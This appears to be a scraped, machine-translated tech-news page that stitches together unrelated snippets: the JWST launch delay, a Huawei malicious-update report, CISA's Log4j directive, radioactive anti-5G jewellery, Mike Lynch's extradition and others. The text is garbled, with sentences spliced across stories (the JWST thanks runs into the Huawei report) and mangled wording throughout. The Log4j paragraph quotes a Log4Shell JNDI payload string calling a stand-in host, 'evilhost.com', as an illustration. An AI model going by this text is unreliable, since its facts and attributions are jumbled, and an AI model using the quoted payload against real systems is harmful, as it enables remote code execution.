CM – James Webb Space Telescope launches on December 24th after cable fixation

Were all of these scientists naughty ... or nice?

Updated The James Webb Space Telescope (JWST) launch was confirmed for December 24th * after engineers investigated and fixed a communication problem aboard the booster and spacecraft combo.

During a briefing on On Thursday, representatives from ESA and NASA – including the Associate Administrator of the Science Mission Directorate of the US space agency, Thomas Zurbuchen – praised the scientific potential of the immensely inflated and severely delayed observatory currently perched on an Ariane 5 rocket in the French ArianeSpace facility in Guiana.

And during that briefing, the communications gremlin was discussed that resulted in the December 22 start date being postponed to « no earlier than » Christmas Eve.

The crux of the problem was a data cable that was used in a longevity test that confirmed that the systems were working and communicating as expected. This test must be passed before the telescope can be encapsulated prior to launch. Zurbuchen told attendees he was optimistic the issue was resolved, but work would not resume until a decision was made at 6:00 p.m. ET.

Well, it’s 6:00 p.m. on the U.S. east coast and Zurbuchen says the cable issue has been resolved and the start is planned for December 24th, although we are waiting for a final confirmation that will not come until Friday:

Straight from the Webb homepage: The team has fixed the connection problem and @NASAWebb is in in the middle of his last scheduled pre-launch liveliness test. Tomorrow we will provide an additional update on the status of the encapsulation and the start date. pic.twitter.com/ehFVzfeeCI

Once the scope is encapsulated, things should move at a more normal pace towards takeoff, although Zurbuchen previously joked that nothing was routine with the James Webb Space Telescope.

It’s fair to say your nerves are tense as the days count down to start. The Ariane 5 has proven to be a reliable workhorse over the years and the observatory itself has undergone thorough testing. What could possibly go wrong?

One possibility arose from an imaginatively altered advertising shot that originally showed the telescope lifted in the air to be attached to his Ariane 5.

We should also make it clear that Catherine was not the author of the picture above. However, it has made the rounds in at least one space agency. A bit of gallows humor for the scientists concerned, we’d bet.

As part of the international agreements behind the JWST, ESA provides launch services. After decades of development, it is completely understandable that engineers don’t want to leave anything to chance. At least as far as we can.

It’s been a long way, but we’re ready for encapsulation today and we’re confirmed to launch on December 24th. There are more updates today.

But I would like to personally thank all of my teams and those of our partners for their dedication to #Webb in 2012, in which a Huawei software update compromised the network of a major Australian telecommunications company with malicious code, according to a report released by Bloomberg.

The report, which is based on interviews with seven former officials, some of whom identified and others not, states that the systems of Optus, a division of Singapore Telecommunications Ltd., were compromised by a malicious update in 2012 – a claim the company denies.

« The update appeared legitimate, however, it contained malicious code that acted much like a digital eavesdropping process that reprogrammed the infected devices to cycle through them all Communications recorded before the data was sent to China, ”the Bloomberg report reads.

The US government’s Cybersecurity and Infrastructure Security Agency (CISA) made its call for it on Friday The Apache Log4j vulnerability escalated with an emergency policy that requires federal agencies to take corrective action by December 23, 2021 at 5:00 p.m. EST.

Log4j is a Java-based open source logging library that is included in Millions of applications is used. Versions up to and including 2.14.1 contain a critical remote code execution bug (CVE-2021-44228), and the fix that was built into version 2.15, released a week ago, has since been bypassed.

The Software library contains a text formatting language that allows code to run, and the vulnerability would allow a remote attacker to construct a string such as $ {jndi: ldap: //127.0.0.1#evilhost.com: 1389 / a} to denote the referenced Retrieve the object on the specified server and run it.

The Dutch Agency for Nuclear Safety and Regulatory Protection has banned a list of so-called anti-5G necklaces, bracelets and eye masks because they could harm their gullible users.

The agency commissioned a study by the Dutch National Institute for Public Health and the Environment (RIVM), which found that many of these so-called radiation hazards Utilities actually emit harmful amounts of ionizing radiation from « radioactive materials or waste ». Emission levels are low, but if you are the kind of person who wears them continuously, they can cause harm.

“The consumer products tested contain radioactive substances and therefore continuously emit ionizing radiation, exposing the wearer. Exposure to ionizing radiation can be detrimental to health, « warned the regulator.

The extradition of Autonomy founder Mike Lynch was temporarily halted after the British software millionaire filed a judicial review in which the legal findings were challenged against him.

The latest move appears to have stopped the clock ticking when Lynch was extradited from the UK by the US government, giving Lynch a few weeks or months of guaranteed freedom.

Lynch is from accused the US of defrauding investors at Hewlett Packard after he sold his company Autonomy to HP for $ 11 billion in 2011.

The type of drone was approved by the Ministry of Defense n ot announced that it issued a press release yesterday regarding the victory of the Royal Air Force Typhoon FGR.4. Reports indicate that Oracle is targeting the $ 30 billion acquisition of US medical records specialist Cerner to further the investigation medical sector.

A potential deal would have an impact on the UK, as Cerner has more than 100 million history in the last year alone.

Admiral, the UK insurance company, was denied legal access to a non-customer’s cell phone location data after alleging that this would help in deciding whether a policyholder is committing fraud or not.

The previously neglected decision of the Court of Appeal of England and Wales, which was issued similarly this week in Germany, raises questions about the application of the law against third party technology service providers.

Vodafone made no objection to Admiral’s request for a Norwich Pharmacal Order (NPO) to be issued in November 2020 to obtain call records from someone who was not an insurance customer – with Admiral’s attorney telling the judges that Cell phones « enabled people to lie about their whereabouts ».

Our Microsoft knitwear is swinging out of the closet become a happy (?) reader. Of course, the winning entry for next year’s topic was Clippy-related, but there were some blasts from the Reg readership.

Shockingly, not everyone seems to be a fan of the Windows giant or its merchandise. Def noted, « I think Microsoft’s knitwear for the next year should continue the Windows 11 theme by putting arms in the middle and sewing the neck together.

Oh dear, did it come to that? I’ve got my youth behind I stumbled through middle age and now I’m obviously panting into my fall years. The website knows it and offers to take me safely down the information superhighway.

All I did was land on the website After doing an organic search, there seemed to be a lot of excessive and barely relevant blah at the top of the home page – like 99.9 percent of commercial sites, I should add – so I started scrolling down to find out what the hell the page is about. Almost immediately, a control panel popped up in the lower right corner of my browser window. Inside was a message, apparently just for me:

On Call IT folks don’t give so much gifts, but recy celn old hardware. A worthy undertaking until the inevitable cry for help arrives. Our answer? Depends on how bad we are feeling right now. Welcome to On-Call Service.

Today’s story comes from « Les » (not his name), who nowadays spends his time tinkering with electronics and giving some working gadgets to those who need them. His story is about a laptop that he had converted and given to a friend – let’s call her « Cynthia », even though she wasn’t called that either.

The laptop was bought for Cynthia’s son. Allegedly for university work – and also an indispensable tool in the years before the current pandemic – but, as so often, something went wrong. And so Les’s phone rang with a request for help.
